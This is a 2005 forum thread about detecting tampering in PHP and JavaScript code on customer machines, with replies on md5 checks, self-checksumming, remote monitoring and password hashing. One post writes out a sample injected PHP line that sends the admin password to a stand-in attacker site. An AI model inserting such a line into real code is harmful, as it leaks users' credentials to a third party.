Is there a way to verify integrity of php/javascript code

Han
Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

Sep 23 '05 #1

Han wrote:
> Our app runs on end-users machines (apache2.x + php5). At this moment
> it is quite easy for someone (who has access to the console) to insert
> a couple lines of php code to steal sensitive info.
>
> Is there a way to check the integrity of the php and javascript code by
> using digital signatures/simple hash/etc. ?
>
> What do you do to verify that your code has not been changed by someone
> else and everything is leaked to a rogue site?
>
> Thanks for your help
> -Han


the md5 of the files would change completely if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.

hope this helps.

iwp

Sep 23 '05 #2
> Our app runs on end-users machines (apache2.x + php5). At this moment
> it is quite easy for someone (who has access to the console) to insert
> a couple lines of php code to steal sensitive info.

If you put sensitive info that you don't want end-users to see on
end-user machines, they don't have to "steal" it, you already gave
it to them.

And why would they need access to the console if they can log in
remotely?

> Is there a way to check the integrity of the php and javascript code by
> using digital signatures/simple hash/etc. ?

Anyone modifying the code can simply see what the hash is on
unmodified code and then modify the code to always send that. Or
they can modify the code to do the hash on an unmodified copy which
is never run.

> What do you do to verify that your code has not been changed by someone
> else and everything is leaked to a rogue site?


You can't. Remember, if the user can view your code on a display,
then someone can aim a webcam at that display and send it anywhere.

You could try using a tamper-proof smart card, but I don't know of any
of those with a graphical display or with networking capabilities.

Gordon L. Burditt
Sep 23 '05 #3
>> Our app runs on end-users machines (apache2.x + php5). At this moment
>> it is quite easy for someone (who has access to the console) to insert
>> a couple lines of php code to steal sensitive info.
>>
>> Is there a way to check the integrity of the php and javascript code by
>> using digital signatures/simple hash/etc. ?
>>
>> What do you do to verify that your code has not been changed by someone
>> else and everything is leaked to a rogue site?
>>
>> Thanks for your help
>> -Han
>
> the md5 of the files would change completely if it was tampered with at
> all.
>
> you can use the php 'md5("path/to/file")' function to check the
> integrity of files through php.


Until, of course, someone modifies their copy so that the path/to/file
points at an *unmodified* copy which is never run but is only used
to pass the integrity check.

Gordon L. Burditt
Sep 23 '05 #4
Han
A simpler attack would be to disable that check.

I guess the solution has to be outside of php. I cannot figure out a
solution though.

-Han

Gordon Burditt wrote:
>>> Our app runs on end-users machines (apache2.x + php5). At this moment
>>> it is quite easy for someone (who has access to the console) to insert
>>> a couple lines of php code to steal sensitive info.
>>>
>>> Is there a way to check the integrity of the php and javascript code by
>>> using digital signatures/simple hash/etc. ?
>>>
>>> What do you do to verify that your code has not been changed by someone
>>> else and everything is leaked to a rogue site?
>>>
>>> Thanks for your help
>>> -Han
>>
>> the md5 of the files would change completely if it was tampered with at
>> all.
>>
>> you can use the php 'md5("path/to/file")' function to check the
>> integrity of files through php.
>
> Until, of course, someone modifies their copy so that the path/to/file
> points at an *unmodified* copy which is never run but is only used
> to pass the integrity check.
>
> Gordon L. Burditt


Sep 23 '05 #5
Han
We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).

Are you saying that this is theoretically impossible? Then we should
just find a solution that makes the hacker's life more difficult.

We cannot be the first one running into this problem. There must be a
solution that doesn't require tamper-proof smart cards.

Thanks
-Han

Sep 23 '05 #6
Han wrote:
> We are not trying to hide sensitive data that belongs to us. The
> sensitive info is the users' data (e.g., their passwords).


Don't store passwords. Problem solved.
Cheers,
Nicholas Sherlock
Sep 23 '05 #7
> We are not trying to hide sensitive data that belongs to us. The
> sensitive info is the users' data (e.g., their passwords).

Does the admin of the server on which the PHP code is running want
the check to work, or does he want to subvert it?

If it's a user's password, why is it in the PHP script (as distinguished
from a database)? Or are you talking about passwords users enter
into their clients to log in?

> Are you saying that this is theoretically impossible? Then we should
> just find a solution that makes the hacker's life more difficult.

If the *SERVER ADMIN* is trying to compromise your code (e.g. it's
some kind of copy protection or licensing check), you don't have
much chance of stopping it. The same applies to a hacker who manages
to get root on the box and who spends enough time to understand the
problem. Pre-scripted attacks are much easier to stop. Another approach
is to put a key part of the operation of the system on a server *YOU*
control, so, for instance, if an activation key gets posted on the
Internet and is widely abused, you can deactivate it.

Doing something like opening the file $_SERVER['PHP_SELF'], computing
a checksum of it, and checking it against a known value is easily
defeated by a human who understands the code, but it will trip up
a virus that simply sticks logging code at the beginning of the
script to leak passwords to a remote (evil) system, at least until
your technique becomes so common that it's worth writing an attack
to defeat it. Oh, yes, you probably have to checksum all of the
file EXCEPT the part containing the 'correct answer', as computing
the checksum of the script when it already contains the answer you're
trying to compute is intentionally difficult, so you might checksum
all but the first line, and the first line is:
<?php $md5sum='a37862648cde79877987383992';

It would work better if you can introduce a system that can be
considered secure. For example, you don't just check the checksum
of the script *in the script*, you also output it to the browser
(perhaps hidden in a HTML comment). Your customer registers his
URL where he installs the script with you, and you poll them all,
verifying the checksum. If it changes, you raise an alarm. We're
assuming that the hacker can't get your customer's server and your
monitoring system at the same time, so replacing the 'correct answer'
is harder to do. Nagios is a nice monitoring system that can run
all sorts of periodic remote checks on your network (like that your
web server is up, that your cert is not expired, and you could do
just about any check on a web page returned that you can write a
script to verify).

> We cannot be the first one running into this problem. There must be a
> solution that doesn't require tamper-proof smart cards.


Tamper-proof smart cards are needed where the holder of the card wants
to cheat the system and there's enough monetary incentive for him
to use a lot of effort trying to do so. I originally thought this
was the situation you were describing, apparently I misinterpreted
what you wanted.

Gordon L. Burditt
Sep 23 '05 #8
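
The scheme described in the reply above (checksum everything except the first line, publish the value in an HTML comment, compare it on a separate monitoring host), worked through as an added example that is not part of any poster's reply. It uses SHA-256 in place of md5; the function names, the `integrity:` comment format and the PHP snippet are constructed for illustration.

```python
import hashlib
import hmac
import re


def body_digest(source):
    """SHA-256 of everything after line 1 (line 1 holds the expected value)."""
    _, _, body = source.partition("\n")
    return hashlib.sha256(body.encode()).hexdigest()


def seal(body):
    """Build a script whose first line embeds the digest of the rest."""
    digest = hashlib.sha256(body.encode()).hexdigest()
    return f"<?php $sum='{digest}';\n{body}"


def self_check(source):
    """The in-script check: compare the value on line 1 with the rest."""
    m = re.match(r"<\?php \$sum='([0-9a-f]{64})';", source)
    return bool(m) and m.group(1) == body_digest(source)


def render(source):
    """The page an honest copy serves, digest hidden in an HTML comment."""
    return f"<html>login form</html><!-- integrity:{body_digest(source)} -->"


def monitor_check(html, baseline):
    """Runs on the monitoring host; the baseline never lives on the web server."""
    m = re.search(r"<!-- integrity:([0-9a-f]{64}) -->", html)
    return bool(m) and hmac.compare_digest(m.group(1), baseline)


# Constructed sample script and two constructed modifications of it.
BODY = "if (check_login($_REQUEST['pass'])) { show_admin(); }\n"
INJECTED = "/* constructed stand-in for an inserted line */\n"

ORIGINAL = seal(BODY)
BASELINE = body_digest(ORIGINAL)          # recorded by the monitor at install time
first_line, _, rest = ORIGINAL.partition("\n")
NAIVE = first_line + "\n" + INJECTED + rest   # line 1 left untouched
RESEALED = seal(INJECTED + BODY)              # line 1 recomputed to match


def report():
    """(self_check, monitor_check) for each copy of the script."""
    copies = {"original": ORIGINAL, "naive": NAIVE, "resealed": RESEALED}
    return {name: (self_check(src), monitor_check(render(src), BASELINE))
            for name, src in copies.items()}


if __name__ == "__main__":
    for name, result in report().items():
        print(name, result)
```

The resealed copy passes the in-script check and is caught only by the monitor's independent baseline; a copy altered to emit the old value in the comment would pass both, which is the limit raised in reply #3.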
Han
Passwords are not stored in plaintext. However, still it's a 2 secs job
to change this line
if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
to
fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
The admin password is leaked the next time user logs in.
[excuse the syntax errors]

Sep 23 '05 #9
Nicholas Sherlock (n_********@hotmail.com) wrote:
: Han wrote:
: > We are not trying to hide sensitive data that belongs to us. The
: > sensitive info is the users' data (e.g., their passwords).

: Don't store passwords. Problem solved.
To be a little clearer, do not store unencrypted passwords, only store the
crypt or md5 checksum of a password.

Use two way encryption of important data like credit card numbers. If the
hardware is stolen then it is much harder to steal the data. If possible
require a person to enter the decrypt password for data. Either when the
system starts up so that the decrypted data is never available except
within the memory of the running computer after a bootup by an authorized
person (though the virtual memory paging file must be considered as well).
Or decrypt the data just as needed, where each set of data has a password
specific to whatever person is authorized to access that data.

Store important data on a "more secure" server (in this case - yours), and
access it through a VPN that requires a manual password.

Combine the two, so that (for example) a cronjob reads a hard coded
password but only via a secure (i.e. encrypted) link to another computer
at a different location.

However, if any person has access, either physical or remote login with
any privileges (intended or not) then the program and the data can never
be completely protected.

One very common strategy to solve this is to make the system and data
available only to people that are trusted. "trusted" actually means
background checks (criminal record checks etc), signed contracts, security
clearances, two key signins, etc etc. continual review of security
procedures and policies. (That is all the stuff that allows large
companies to charge outrageous prices.)

Another strategy used in some settings - the server hardware does not
belong to the customer. The seller (you in your example) still owns the
hardware. The customer has no privileged access, but does have physical
control of the box. You login remotely to do upgrades etc, or other
maintenance. They might control your remote access by physically
disconnecting your connection to the box, and possibly monitoring your
connection when you work on it (you'll need to use a challenge/response
login if they monitor your access).

--

This programmer available for rent.
Sep 23 '05 #10
